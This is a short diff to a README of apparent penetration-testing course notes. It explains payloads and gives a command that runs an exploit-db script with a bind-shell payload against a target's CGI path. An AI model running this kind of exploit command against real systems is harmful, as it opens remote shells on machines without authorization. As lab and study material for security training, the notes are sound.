Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

 **Payload**
-- A payload is an exploit script example is below
+- A payload is an exploit script example is below - This is without using metasploit and doing it manually
 - `python /usr/share/exploitdb/exploits/linux/remote/34900.py payload=bind rhost=192.168.0.21 rport=80 pages=/cgi-bin/vulnerable`

 - In the above command /usr/share/exploitdb/ is the path displayed in the searchsploit display screen and then the remainder of the path is the part that is next to